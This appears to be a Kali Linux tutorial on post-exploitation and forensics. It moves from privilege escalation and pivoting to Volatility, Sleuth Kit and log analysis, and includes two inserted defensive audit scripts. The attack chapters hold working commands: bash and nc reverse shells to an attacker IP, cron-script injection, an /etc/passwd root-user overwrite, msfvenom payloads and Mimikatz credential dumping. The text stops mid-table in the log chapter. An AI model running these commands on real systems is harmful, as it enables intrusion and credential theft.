KALI LINUX SERIES

Kali Linux — Part 5

Post-Exploitation & Forensics — Complete Guide

LinPEAS/WinPEAS, Netcat/Socat, Chisel Tunneling, Privilege Escalation techniques, Volatility Memory Forensics, Autopsy Disk Forensics, Log Analysis — a complete reference from Post-Exploitation to Incident Response.

root@kali:~# ./linpeas.sh | tee linpeas_out.txt
root@kali:~# volatility -f memory.dmp --profile=Win10x64 pslist
root@kali:~# find / -perm -4000 -type f 2>/dev/null
📋 Table of Contents — Part 5

01 LinPEAS & WinPEAS — PrivEsc Enumeration
   Automatically finding privilege escalation vectors, for both Linux and Windows
02 Linux Privilege Escalation — Manual Techniques
   SUID/SGID exploit, Sudo misconfiguration, Cron job hijack, PATH injection, Kernel exploit
03 Windows Privilege Escalation
   Token impersonation, Service misconfiguration, AlwaysInstallElevated, Registry, DLL hijacking
04 Netcat, Socat & Chisel — Tunneling & Pivoting
   Port forwarding, SOCKS proxy, Network pivoting — all commands
05 Volatility — Memory Forensics
   RAM dump analysis, Process, Network, Malware detection — all commands
06 Autopsy & Sleuth Kit — Disk Forensics
   Disk image analysis, Deleted file recovery, Timeline analysis
07 Log Analysis & Incident Response
   Linux logs, journalctl, Compromised system check, Evidence collection
08 Covering Tracks
   History clear, Log tamper, File timestamp modify, Persistence remove
CHAPTER 01
🐧 LinPEAS & WinPEAS — Automated PrivEsc Enumeration
Automatically find every privilege escalation vector on the target system
linpeas.sh / winpeas.exe
PEASS-ng suite — automatically scans Linux and Windows for PrivEsc vectors and gives color-coded output

🐧 LinPEAS — Deliver & Run on Target

═══ Method 1: Transfer from the attacker over an HTTP server ═══
# On the attacker machine (in the folder that contains linpeas.sh):
root@kali:~# python3 -m http.server 8080
# Download and run on the target machine:
target$ wget http://192.168.1.100:8080/linpeas.sh -O /tmp/linpeas.sh
target$ chmod +x /tmp/linpeas.sh && /tmp/linpeas.sh
═══ Method 2: Run directly with curl (nothing saved to disk) ═══
target$ curl 192.168.1.100:8080/linpeas.sh | sh
═══ Method 3: Directly from GitHub ═══
target$ curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
═══ Save the output to a file (for later analysis) ═══
target$ ./linpeas.sh | tee /tmp/linpeas_output.txt
═══ Send the output to the attacker (with nc) ═══
# On the attacker:
root@kali:~# nc -lvnp 9001 | tee linpeas_result.txt
# On the target:
target$ ./linpeas.sh | nc 192.168.1.100 9001

⚙️ LinPEAS — Flags & Options

| Flag | Function |
|---|---|
| -a | Run all checks (slow but thorough) |
| -s | Super fast mode (fewer checks) |
| -o section | Run only a specific section (SysI, UsrI, SofI, NetI, FilI, ProI) |
| -d | Extra checks, such as directory permissions |
| -D | Debug mode |
| -P password | Provide the current user's password (for sudo checks) |
| -q | Quiet mode, less noise |

🏷️ LinPEAS Output Color Codes

🔴 Red/Yellow — Critical!
Highly probable PE vector — look at these first: SUID files, writable paths, sudo misconfigs.

🟡 Yellow — Interesting
Interesting information — check manually: config files, cron jobs, network info.

🔵 Blue — Info
General system info — keep for reference.

⚪ White — Normal
Normal/expected output — generally ignore.

🪟 WinPEAS — Windows PrivEsc Enumeration

# Transfer to the Windows target (via SMB)
root@kali:~# impacket-smbserver share /opt/tools -smb2support
# On the Windows target:
C:\> copy \\192.168.1.100\share\winpeas.exe C:\Windows\Temp\
C:\> cd C:\Windows\Temp && winpeas.exe
# Download with PowerShell (DownloadFile saves the binary; IEX only executes script text, not an .exe)
PS C:\> (New-Object Net.WebClient).DownloadFile('http://192.168.1.100:8080/winpeasany.exe', 'C:\Windows\Temp\winpeas.exe')
# Run a specific category
C:\> winpeas.exe systeminfo
C:\> winpeas.exe userinfo
C:\> winpeas.exe servicesinfo
C:\> winpeas.exe applicationsinfo
C:\> winpeas.exe networkinfo
C:\> winpeas.exe windowscreds
# Save the output to a file
C:\> winpeas.exe > C:\Windows\Temp\winpeas_out.txt 2>&1
# Quiet mode
C:\> winpeas.exe quiet
CHAPTER 02
⬆️ Linux Privilege Escalation — Manual Techniques
SUID, Sudo, Cron, PATH, Kernel — all the ways to gain root on Linux

🔍 Initial Enumeration — What to Check First

# Basic system info
target$ id && whoami                               # Current user
target$ uname -a                                   # Kernel version
target$ cat /etc/os-release                        # OS version
target$ cat /etc/passwd                            # All users
target$ cat /etc/shadow                            # Password hashes (needs root)
target$ sudo -l                                    # Sudo permissions
target$ env                                        # Environment variables
target$ history                                    # Command history
target$ ls -la /home/                              # Other users' home directories
target$ cat /etc/crontab                           # Cron jobs
target$ ls -la /etc/cron*                          # All cron files
target$ ps aux                                     # Running processes
target$ netstat -tulnp 2>/dev/null || ss -tulnp    # Open ports

🔑 SUID/SGID — Exploit

💡 What is SUID?
A file with the SUID (Set User ID) bit set runs with the permissions of the file owner when executed. If a root-owned SUID file exists and is exploitable, a root shell is possible.
# Find SUID files
target$ find / -perm -4000 -type f 2>/dev/null
target$ find / -perm -u=s -type f 2>/dev/null
# Find SGID files
target$ find / -perm -2000 -type f 2>/dev/null
# SUID and SGID together
target$ find / -perm -6000 -type f 2>/dev/null
# Exploit via GTFOBins — example: if /usr/bin/find is SUID
target$ find . -exec /bin/sh -p \; -quit
# If /usr/bin/vim is SUID
target$ vim -c ':py3 import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'
# If /usr/bin/python3 is SUID
target$ python3 -c 'import os; os.execl("/bin/sh", "sh", "-p")'
# If /usr/bin/cp is SUID — copy over /etc/passwd (replace "hash" with the openssl output)
target$ openssl passwd -1 -salt hack hackedpass
target$ echo 'hacker:$1$hack$hash:0:0:root:/root:/bin/bash' >> /tmp/passwd
target$ cp /tmp/passwd /etc/passwd
target$ su hacker

🔐 Sudo Misconfiguration

# Check sudo permissions
target$ sudo -l
# Example output: (ALL) NOPASSWD: /usr/bin/vim
# This means vim can be run as root without a password
# Root shell via sudo vim:
target$ sudo vim -c ':!/bin/bash'
# Root shell via sudo python:
target$ sudo python3 -c 'import pty; pty.spawn("/bin/bash")'
# Via sudo awk:
target$ sudo awk 'BEGIN {system("/bin/bash")}'
# Via sudo find:
target$ sudo find /etc -exec /bin/bash \;
# Via sudo nmap (old versions):
target$ echo "os.execute('/bin/sh')" > /tmp/shell.nse && sudo nmap --script=/tmp/shell.nse
# Via sudo less / man / more — run !/bin/bash from inside the pager:
target$ sudo less /etc/passwd
# then type: !/bin/bash
# Via sudo env:
target$ sudo env /bin/bash
# With (ALL) NOPASSWD: ALL, directly:
target$ sudo su
target$ sudo /bin/bash

⏰ Cron Job Hijacking

# Find cron jobs
target$ cat /etc/crontab
target$ ls -la /etc/cron.d/ /etc/cron.daily/ /etc/cron.hourly/
target$ cat /var/spool/cron/crontabs/*
target$ crontab -l
# Check whether any referenced script is writable
# Example: /etc/crontab contains: * * * * * root /opt/scripts/backup.sh
target$ ls -la /opt/scripts/backup.sh
# -rw-rw-rw- means everyone can write to it
# Inject a reverse shell into the script
target$ echo "bash -i >& /dev/tcp/192.168.1.100/4444 0>&1" >> /opt/scripts/backup.sh
# Start a listener on the attacker
root@kali:~# nc -lvnp 4444
# You get a root shell when the cron job runs
# If the script does not exist, create it
target$ echo '#!/bin/bash' > /opt/scripts/backup.sh
target$ echo 'bash -i >& /dev/tcp/192.168.1.100/4444 0>&1' >> /opt/scripts/backup.sh
target$ chmod +x /opt/scripts/backup.sh

🛤️ PATH Injection

# Check whether a SUID script or cron job runs a command without its full path
# Example: script.sh contains "service apache2 restart" (no full path)
# Put a writable directory at the front of PATH
target$ export PATH=/tmp:$PATH
# Create a fake "service" command in /tmp
target$ echo '#!/bin/bash' > /tmp/service
target$ echo '/bin/bash -p' >> /tmp/service
target$ chmod +x /tmp/service
# Now run the SUID script → root shell
target$ ./vulnerable_suid_script
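The defender's counterpart to the cron hijack and PATH injection sections above, as an added example that is not part of the original page: a POSIX sh audit that walks a system-style crontab and reports world-writable scripts, scripts that are missing from a world-writable directory, and commands given without an absolute path. Function names are hypothetical, and the crontab and scripts are a constructed sample built in a temporary directory.

```shell
#!/bin/sh
# Added example, not from the original page: audit a system crontab for the three
# cron weaknesses described above. Function names are hypothetical; the lab data
# is a constructed sample.

# Print the command word of every active entry in a system-style crontab
# (5 time fields + user + command; @reboot-style entries have 1 time field).
cron_commands() {
    awk '/^[[:space:]]*#/ || NF == 0 { next }    # comments and blank lines
         /^[A-Za-z_][A-Za-z0-9_]*=/ { next }      # SHELL=, PATH=, MAILTO= assignments
         $1 ~ /^@/ { if (NF >= 3) print $3; next } # @reboot / @daily entries
         NF >= 7 { print $7 }' "$1"
}

# True when the path exists and the "other" write bit is set.
world_writable() {
    [ -e "$1" ] && [ -n "$(find "$1" -maxdepth 0 -perm -002)" ]
}

# Print one line per finding (WRITABLE / MISSING / RELATIVE) for the crontab in $1.
# Exit status 0 when nothing was found, 1 otherwise.
audit_crontab() {
    findings=0
    for cmd in $(cron_commands "$1"); do
        case $cmd in
            /*)
                if [ ! -e "$cmd" ]; then
                    # A missing script in a world-writable directory can be planted by
                    # any local user and then runs as the entry's user (often root).
                    if world_writable "$(dirname "$cmd")"; then
                        echo "MISSING $cmd (parent directory is world-writable)"
                        findings=$((findings + 1))
                    fi
                elif world_writable "$cmd"; then
                    echo "WRITABLE $cmd"
                    findings=$((findings + 1))
                fi
                ;;
            *)
                # No absolute path: cron resolves it through PATH, so a writable
                # directory early in PATH can supply a look-alike binary.
                echo "RELATIVE $cmd (resolved through PATH)"
                findings=$((findings + 1))
                ;;
        esac
    done
    [ "$findings" -eq 0 ]
}

# Build a throwaway lab reproducing the situations from the text; print its path.
build_sample_lab() {
    lab=$(mktemp -d)
    mkdir -p "$lab/opt/scripts" "$lab/tmp"
    chmod 1777 "$lab/tmp"                                  # world-writable, like /tmp
    printf '#!/bin/sh\ntar czf /backup.tgz /var/www\n' > "$lab/opt/scripts/backup.sh"
    chmod 666 "$lab/opt/scripts/backup.sh"                 # the -rw-rw-rw- script from the text
    printf '#!/bin/sh\necho ok\n' > "$lab/opt/scripts/safe.sh"
    chmod 755 "$lab/opt/scripts/safe.sh"                   # correctly permissioned
    cat > "$lab/crontab" <<EOF
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin
# m h dom mon dow user command
* * * * * root $lab/opt/scripts/backup.sh
0 3 * * * root $lab/opt/scripts/safe.sh
30 2 * * * root service apache2 restart
@reboot root $lab/tmp/cleanup.sh
EOF
    echo "$lab"
}

# Demo on the constructed lab (on a real host: audit_crontab /etc/crontab).
lab=$(build_sample_lab)
audit_crontab "$lab/crontab" || echo "cron audit: the findings above need attention"
rm -rf "$lab"
```

The same function also works on the files in /etc/cron.d, which use the system crontab format with the user field.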

🐛 Kernel Exploit

# Check the kernel version
target$ uname -r
target$ cat /proc/version
# Search for kernel exploits with searchsploit
root@kali:~# searchsploit linux kernel 4.15 privilege escalation
# Popular kernel exploits:
# DirtyCow (CVE-2016-5195) — kernel 2.6.22 to 4.8.3
target$ wget http://192.168.1.100:8080/dirtycow.c -O /tmp/cow.c
target$ gcc -pthread /tmp/cow.c -o /tmp/dirtycow -lcrypt && /tmp/dirtycow
# DirtyPipe (CVE-2022-0847) — kernel 5.8 to 5.16.11
target$ ./dirtypipe /etc/passwd
# Linux Exploit Suggester
target$ wget http://192.168.1.100:8080/linux-exploit-suggester.sh
target$ chmod +x linux-exploit-suggester.sh && ./linux-exploit-suggester.sh

📁 Other PrivEsc Vectors

# Find world-writable and sensitive files
target$ find / -writable -type f 2>/dev/null | grep -v proc
target$ find / -writable -type d 2>/dev/null | grep -v proc
# Weak file permissions
target$ ls -la /etc/passwd /etc/shadow /etc/sudoers
target$ ls -la /root/
# Interesting files
target$ find / -name "*.conf" -readable 2>/dev/null | head -20
target$ find / -name "id_rsa" -o -name "id_dsa" 2>/dev/null
target$ find / -name "*.bak" -o -name "*.backup" 2>/dev/null
target$ grep -r "password" /etc/ 2>/dev/null
target$ grep -r "password" /var/www/ 2>/dev/null
# NFS shares (no_root_squash)
target$ cat /etc/exports
root@kali:~# showmount -e target_ip
root@kali:~# mount -o rw,vers=2 target_ip:/share /mnt/nfs
# Check for docker group membership
target$ id | grep docker
target$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# Capabilities check
target$ getcap -r / 2>/dev/null
# If python3 has cap_setuid+ep:
target$ python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
CHAPTER 03
🪟 Windows Privilege Escalation
Token impersonation, service misconfiguration, registry — ways to get SYSTEM on Windows

🔍 Initial Enumeration

# System info
C:\> systeminfo                                               # OS, hotfixes, architecture
C:\> whoami /all                                              # Current user + groups + privileges
C:\> net user                                                 # All local users
C:\> net localgroup administrators                            # Admin group members
C:\> net user [username]                                      # Specific user details
C:\> ipconfig /all                                            # Network info
C:\> netstat -ano                                             # Open connections
C:\> tasklist /SVC                                            # Running processes + services
C:\> schtasks /query /fo LIST /v                              # Scheduled tasks
C:\> wmic service get name,displayname,startname,startmode    # Services

🎭 Token Impersonation — Juicy Potato / PrintSpoofer

💡 SeImpersonatePrivilege
If SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege appears in whoami /priv, Juicy Potato / PrintSpoofer / RoguePotato can be used to become SYSTEM.
# Check privileges
C:\> whoami /priv
# PrintSpoofer (Windows 10, Server 2016/2019)
C:\> PrintSpoofer.exe -i -c cmd
C:\> PrintSpoofer.exe -c "nc.exe 192.168.1.100 4444 -e cmd"
# JuicyPotato (Windows < 2019)
C:\> JuicyPotato.exe -l 1337 -p cmd.exe -a "/c whoami" -t *
C:\> JuicyPotato.exe -l 1337 -p cmd.exe -a "/c nc.exe 192.168.1.100 4444 -e cmd" -t *
# GodPotato (all Windows versions)
C:\> GodPotato.exe -cmd "cmd /c whoami"
C:\> GodPotato.exe -cmd "nc.exe 192.168.1.100 4444 -e cmd"

⚙️ Service Misconfiguration

# Find unquoted service paths
C:\> wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"
# Check service permissions
C:\> accesschk.exe -wuvc "Everyone" * /accepteula
C:\> accesschk.exe -wuvc "BUILTIN\Users" * /accepteula
# Vulnerable service path
# Example: C:\Program Files\Vulnerable Service\service.exe
# If C:\Program.exe is created, it runs instead (unquoted path)
# The payload is built on the attacker (msfvenom runs on Kali, not on the target):
root@kali:~# msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o Program.exe
C:\> copy Program.exe "C:\Program.exe"
C:\> net stop [service] && net start [service]
# Weak service permissions
C:\> sc config [service] binpath= "C:\Windows\Temp\payload.exe"
C:\> net stop [service] && net start [service]

📋 Registry PrivEsc

# Check AlwaysInstallElevated
C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# If both are 0x1 → build an MSI payload:
root@kali:~# msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f msi -o payload.msi
C:\> msiexec /quiet /qn /i C:\Windows\Temp\payload.msi
# Look for autologon credentials
C:\> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
# Saved credentials
C:\> cmdkey /list
C:\> runas /savecred /user:admin "cmd.exe /c whoami"

🔑 Pass-the-Hash / Credential Dumping

# hashdump via Meterpreter (needs SYSTEM)
meterpreter> hashdump
# Mimikatz — as SYSTEM you get all credentials
meterpreter> load kiwi
meterpreter> creds_all
meterpreter> lsa_dump_sam
meterpreter> lsa_dump_secrets
# Mimikatz directly (cmd.exe as SYSTEM)
C:\> mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
C:\> mimikatz.exe "privilege::debug" "lsadump::sam" "exit"
# Pass-the-Hash with CrackMapExec
root@kali:~# cme smb 192.168.1.5 -u administrator -H 'NTLM_HASH'
CHAPTER 04
🚇 Netcat, Socat & Chisel — Tunneling & Pivoting
Bypass firewalls and reach internal networks with port forwarding and SOCKS proxies

📡 Netcat — Complete Commands

| Command | Function |
|---|---|
| nc -lvnp 4444 | Start a TCP listener (-l=listen, -v=verbose, -n=no DNS, -p=port) |
| nc 192.168.1.5 4444 | Connect via TCP |
| nc -lvnp 4444 -e /bin/bash | Bind shell — open a port and serve bash |
| nc host port -e /bin/bash | Send a reverse shell |
| nc -lvnp 4444 > file.txt | Save incoming data to a file |
| nc host port < file.txt | Send a file |
| nc -zv host 1-1000 | Port scan |
| nc -u host 53 | UDP connection |
| nc -w 5 host port | Set a 5 second timeout |
| rm /tmp/f;mkfifo /tmp/f;cat /tmp/f\|/bin/sh -i 2>&1\|nc host port >/tmp/f | Reverse shell via a named pipe (OpenBSD nc, which has no -e) |

🔄 Socat — Advanced Networking Tool

# TTY reverse shell listener (gives the best shell)
root@kali:~# socat file:`tty`,raw,echo=0 TCP-LISTEN:4444
# Send a fully interactive shell from the target
target$ socat TCP:192.168.1.100:4444 EXEC:'bash -li',pty,stderr,setsid,sigint,sane
# Simple bind shell
target$ socat TCP-LISTEN:4444,reuseaddr,fork EXEC:/bin/bash,pty,stderr
root@kali:~# socat - TCP:target:4444
# Port forwarding — local 8080 → remote 80
target$ socat TCP-LISTEN:8080,reuseaddr,fork TCP:192.168.1.200:80
# SSL-encrypted reverse shell
root@kali:~# openssl req -newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt
root@kali:~# cat shell.key shell.crt > shell.pem
root@kali:~# socat OPENSSL-LISTEN:4444,cert=shell.pem,verify=0 FILE:`tty`,raw,echo=0
target$ socat OPENSSL:192.168.1.100:4444,verify=0 EXEC:/bin/bash,pty,stderr,setsid

🚇 Chisel — HTTP-based Tunneling

💡 What is Chisel?
Chisel tunnels TCP over HTTP, so it works even when the firewall only allows HTTP. Ideal for reaching internal networks.
═══ Remote Port Forward — reach a target service from the attacker ═══
# Start the server on the attacker:
root@kali:~# chisel server -p 8080 --reverse
# Run the client on the target (forward internal port 80):
target$ chisel client 192.168.1.100:8080 R:9090:127.0.0.1:80
# Now the target's port 80 is reachable on the attacker at localhost:9090
═══ SOCKS5 Proxy (reach the whole internal network) ═══
# On the attacker:
root@kali:~# chisel server -p 8080 --reverse
# On the target:
target$ chisel client 192.168.1.100:8080 R:socks
# Configure proxychains on the attacker:
root@kali:~# echo "socks5 127.0.0.1 1080" >> /etc/proxychains4.conf
# Now reach the internal network through proxychains:
root@kali:~# proxychains nmap -sT -p 80,443,22 192.168.2.5
root@kali:~# proxychains curl http://192.168.2.5
root@kali:~# proxychains ssh user@192.168.2.5
═══ Local Port Forward — forward an attacker service to the target ═══
target$ chisel client 192.168.1.100:8080 3000:localhost:3000

🔀 SSH Tunneling / Port Forwarding

# Local Port Forward — localhost:8080 → target:80
root@kali:~# ssh -L 8080:127.0.0.1:80 user@target -N
# Remote Port Forward — target's 4444 → attacker:4444
root@kali:~# ssh -R 4444:127.0.0.1:4444 user@target -N
# Dynamic Port Forward — SOCKS proxy (internal network)
root@kali:~# ssh -D 1080 user@target -N
# use it through proxychains
# Double pivot — target → internal → deep internal
root@kali:~# ssh -L 8888:192.168.2.5:22 user@192.168.1.5 -N
root@kali:~# ssh -p 8888 user@127.0.0.1
CHAPTER 05
🧠 Volatility — Memory Forensics
Extract processes, network connections, malware, and credentials from RAM dumps
volatility3 / vol.py
Open-source memory forensics framework — analyzes Windows, Linux, and macOS memory dumps

🚀 Volatility 3 — Basic Setup & Syntax

# Install (if not already present)
root@kali:~# pip3 install volatility3
root@kali:~# git clone https://github.com/volatilityfoundation/volatility3.git
root@kali:~# cd volatility3 && python3 setup.py install
# Basic syntax (Volatility 3):
# vol -f [memory_dump] [plugin]
root@kali:~# vol -f memory.dmp windows.info
# Volatility 2 syntax (still used in many CTFs):
# volatility -f [dump] --profile=[profile] [plugin]
root@kali:~# volatility -f memory.dmp --profile=Win10x64_19041 pslist
# Identify the profile (Volatility 2)
root@kali:~# volatility -f memory.dmp imageinfo
root@kali:~# volatility -f memory.dmp kdbgscan

💻 Process Analysis

| Plugin (Vol3) | Plugin (Vol2) | Function |
|---|---|---|
| windows.pslist | pslist | Show running processes (from the EPROCESS list) |
| windows.pstree | pstree | Show the process tree (parent-child relationships) |
| windows.psscan | psscan | Pool scanning — find hidden processes |
| windows.dlllist | dlllist | Show the DLLs loaded by a process |
| windows.cmdline | cmdline | Show the command line arguments of each process |
| windows.handles | handles | Show open handles |
| windows.malfind | malfind | Find injected code/malware (suspicious memory regions) |
| windows.memmap | memmap | Show the process memory map |
| windows.procdump | procdump | Dump a process executable to disk |
| windows.memdump | memdump | Dump the entire memory of a process |

🌐 Network Analysis

| Plugin (Vol3) | Plugin (Vol2) | Function |
|---|---|---|
| windows.netstat | netscan | Show network connections (active + closed) |
| windows.netstat | connections | Active TCP connections (WinXP/2003) |
| windows.netstat | connscan | Connection pool scan (including terminated) |

📁 File System & Registry

| Plugin (Vol3) | Plugin (Vol2) | Function |
|---|---|---|
| windows.filescan | filescan | Find file objects in memory |
| windows.dumpfiles | dumpfiles | Extract files from memory |
| windows.registry.hivelist | hivelist | List registry hives |
| windows.registry.printkey | printkey | Show registry key values |
| windows.registry.userassist | userassist | Show recently accessed programs |

🔑 Credentials Extraction

| Plugin (Vol3) | Plugin (Vol2) | Function |
|---|---|---|
| windows.hashdump | hashdump | Dump password hashes from the SAM database |
| windows.lsadump | lsadump | Dump LSA secrets |
| windows.cachedump | cachedump | Dump cached domain credentials |
| windows.clipboard | clipboard | Show clipboard data |

# Volatility 3 — full workflow
root@kali:~# vol -f memory.dmp windows.info        # OS info
root@kali:~# vol -f memory.dmp windows.pslist      # Process list
root@kali:~# vol -f memory.dmp windows.pstree      # Process tree
root@kali:~# vol -f memory.dmp windows.psscan      # Hidden processes
root@kali:~# vol -f memory.dmp windows.netstat     # Network connections
root@kali:~# vol -f memory.dmp windows.cmdline     # Command line args
root@kali:~# vol -f memory.dmp windows.malfind     # Injected code
root@kali:~# vol -f memory.dmp windows.hashdump    # Password hashes
root@kali:~# vol -f memory.dmp windows.filescan | grep -i "\.txt\|\.docx\|\.pdf"
# Dump the process with a specific PID
root@kali:~# vol -f memory.dmp windows.procdump --pid 1234 --dump-dir /tmp/dumps/
# Extract a file (by offset)
root@kali:~# vol -f memory.dmp windows.dumpfiles --virtaddr 0xc000012345
# Extract strings (passwords sometimes turn up)
root@kali:~# strings memory.dmp | grep -i "password\|passwd\|credential"
CHAPTER 06
💽 Autopsy & Sleuth Kit — Disk Forensics
Disk image analysis, deleted file recovery, file timelines — collecting digital evidence

💽 Create a Disk Image

# Create a disk image with dd
root@kali:~# dd if=/dev/sdb of=/evidence/disk.img bs=4M status=progress
# dcfldd (dd + hash verification)
root@kali:~# dcfldd if=/dev/sdb of=/evidence/disk.img hash=md5 md5log=/evidence/hash.txt
# Verify the image (MD5)
root@kali:~# md5sum /evidence/disk.img
# Mount the image (read-only)
root@kali:~# mount -o ro,loop /evidence/disk.img /mnt/evidence
# Mount a specific partition
root@kali:~# fdisk -l disk.img                                    # Look up the partition offset
root@kali:~# mount -o ro,loop,offset=$((512*2048)) disk.img /mnt/part1

🔍 The Sleuth Kit (TSK) — CLI Forensics

| Command | Function |
|---|---|
| mmls disk.img | Show the partition table |
| fsstat -o 2048 disk.img | Show file system info |
| fls -r -o 2048 disk.img | List all files and directories (including deleted) |
| fls -r -d -o 2048 disk.img | Show only deleted files |
| icat -o 2048 disk.img [inode] | View/recover a file by inode |
| ils -o 2048 disk.img | Show inode information |
| tsk_recover disk.img /output/ | Extract recoverable files |
| tsk_gettimes -o 2048 disk.img > timeline.txt | Create a file timeline |
| mactime -b timeline.txt -d > readable.csv | Create a human-readable timeline |

🖥️ Autopsy — GUI Forensics Platform

# Start Autopsy
root@kali:~# autopsy
# Open in the browser: http://localhost:9999/autopsy
# Create a case in CLI mode
root@kali:~# autopsy -c /evidence/case/

| Autopsy Feature | Function |
|---|---|
| Add Data Source | Import a disk image, folder, or VM |
| File Analysis | Browse the file system, hex view, view metadata |
| Keyword Search | Search all files by text string or regex |
| Deleted Files | Recover deleted files |
| Timeline Analysis | View the file activity timeline |
| Hash Sets | Match files against known malware hashes |
| Web Artifacts | View browser history, cookies, downloads |
| Email Analysis | Parse email files |
| Report Generation | Generate HTML/PDF reports |

🔧 Other Forensics Tools

# Foremost — file carving (deleted file recovery)
root@kali:~# foremost -i disk.img -o /output/ -t jpg,pdf,doc,zip
# Scalpel — advanced file carving
root@kali:~# scalpel disk.img -o /output/
# Binwalk — firmware/binary analysis
root@kali:~# binwalk firmware.bin             # Analyze
root@kali:~# binwalk -e firmware.bin          # Extract
root@kali:~# binwalk -dd '.*' firmware.bin    # Extract everything
# Exiftool — file metadata
root@kali:~# exiftool image.jpg               # View EXIF data
root@kali:~# exiftool -all= image.jpg         # Remove all metadata
root@kali:~# exiftool -r *.jpg                # Recursive analysis
# Strings — readable text from a binary
root@kali:~# strings -a malware.exe | grep -i "http\|pass\|key"
# File type check
root@kali:~# file suspicious_file
root@kali:~# xxd suspicious_file | head -5    # View the magic bytes
# Hash calculation
root@kali:~# md5sum file && sha1sum file && sha256sum file
CHAPTER 07
📋 Log Analysis & Incident Response
Analyze Linux and Windows logs, identify compromised systems, collect evidence

📄 Linux Log Files — Important Locations

| Log File | Function | Importance |
|---|---|---|
| /var/log/auth.log | SSH login, sudo, authentication events | Critical |
| /var/log/syslog | General system messages | High |
| /var/log/kern.log | Kernel messages | Medium |
| /var/log/apache2/access.log | Apache web access log | Critical |
| /var/log/apache2/error.log | Apache error log | High |
| /var/log/nginx/access.log | Nginx access log | Critical |
| /var/log/mysql/mysql.log | MySQL query log | High |
| /var/log/cron | Cron job execution log | High |
| /var/log/btmp | Failed login attempts (binary) | Critical |
| /var/log/wtmp | Login/logout history (binary) | High |
| /var/log/lastlog | Last login per user (binary) | Medium |
| /root/.bash_history | Root's command history | Critical |

🔍 Log Analysis Commands

# Failed SSH login attempts
root@kali:~# grep "Failed password" /var/log/auth.log | tail -50
# ($11 is the source IP only for lines without "invalid user"; those lines carry it in $13)
root@kali:~# grep "Failed password" /var/log/auth.log | awk '{print $11}' | sort | uniq -c | sort -rn | head
# Successful SSH logins
root@kali:~# grep "Accepted password\|Accepted publickey" /var/log/auth.log
# Sudo usage
root@kali:~# grep "sudo" /var/log/auth.log | grep -v "pam_unix"
# User creation
root@kali:~# grep "useradd\|adduser" /var/log/auth.log
# Web attack signatures
root@kali:~# grep -E "union|select|insert|drop|exec|passwd|etc" /var/log/apache2/access.log
root@kali:~# grep -E "\.\.\/|etc/passwd|/bin/sh|cmd\.exe" /var/log/apache2/access.log
# How many times each IP accessed the site
root@kali:~# awk '{print $1}' /var/log/apache2/access.log | sort | uniq -c | sort -rn | head -20
# 404 errors (is a scanner running?)
root@kali:~# grep " 404 " /var/log/apache2/access.log | awk '{print $1}' | sort | uniq -c | sort -rn
# Login history (binary logs)
root@kali:~# last -a | head -30      # Login history
root@kali:~# lastb | head -30        # Failed logins
root@kali:~# lastlog                 # Last login per user
root@kali:~# who                     # Currently logged in
root@kali:~# w                       # Who is logged in and what they are doing
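The failed-login triage above, carried one step further as an added example that is not part of the original page: instead of a fixed awk field (which lands on the wrong word for "invalid user" lines), the source IP is read from the word after "from", and a second pass flags the pattern that matters most in incident response, a successful login from an address that had already failed repeatedly. The auth.log lines are a constructed sample; function names are hypothetical.

```shell
#!/bin/sh
# Added example, not from the original page: brute-force triage over auth.log lines.
# The log sample is constructed; function names are hypothetical.

AUTH_LOG_SAMPLE='Jan 10 10:01:02 web01 sshd[2211]: Failed password for root from 203.0.113.7 port 51022 ssh2
Jan 10 10:01:05 web01 sshd[2213]: Failed password for invalid user admin from 203.0.113.7 port 51030 ssh2
Jan 10 10:01:09 web01 sshd[2215]: Failed password for invalid user oracle from 203.0.113.7 port 51041 ssh2
Jan 10 10:02:11 web01 sshd[2230]: Failed password for alice from 198.51.100.4 port 40010 ssh2
Jan 10 10:02:40 web01 sshd[2231]: Accepted password for alice from 198.51.100.4 port 40012 ssh2
Jan 10 10:03:00 web01 sshd[2240]: Failed password for root from 203.0.113.7 port 51090 ssh2
Jan 10 10:04:15 web01 sshd[2250]: Accepted publickey for deploy from 192.0.2.9 port 60000 ssh2: RSA SHA256:constructed
Jan 10 10:05:00 web01 sshd[2260]: Accepted password for root from 203.0.113.7 port 51100 ssh2'

# Read auth.log lines on stdin; print "<failures> <ip>" per source, most active first.
# The IP is the word after "from", so "invalid user" lines are counted correctly too.
failed_by_ip() {
    awk '/sshd\[[0-9]+\]: Failed password for/ {
             for (i = 1; i <= NF; i++) if ($i == "from") fail[$(i + 1)]++
         }
         END { for (ip in fail) print fail[ip], ip }' | sort -rn
}

# Read auth.log lines on stdin; print "<ip> <user>" for each successful login from a
# source that had already failed at least $1 times earlier in the log. This
# brute-force-then-success pattern is what separates a compromise from noise.
success_after_failures() {
    awk -v min="$1" '
        /sshd\[[0-9]+\]: Failed password for/ {
            for (i = 1; i <= NF; i++) if ($i == "from") fail[$(i + 1)]++
        }
        /sshd\[[0-9]+\]: Accepted (password|publickey) for/ {
            ip = ""; user = ""
            for (i = 1; i <= NF; i++) {
                if ($i == "for")  user = $(i + 1)
                if ($i == "from") ip = $(i + 1)
            }
            if (ip != "" && fail[ip] >= min) print ip, user
        }'
}

# Demo on the constructed sample (on a real host: cat /var/log/auth.log | failed_by_ip).
echo "Failed logins per source IP:"
printf '%s\n' "$AUTH_LOG_SAMPLE" | failed_by_ip
echo "Successful logins preceded by 3 or more failures from the same IP:"
printf '%s\n' "$AUTH_LOG_SAMPLE" | success_after_failures 3
```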

⚙️ journalctl — Systemd Log Analysis

| Command | Function |
|---|---|
| journalctl | Show all system logs |
| journalctl -f | Follow logs live |
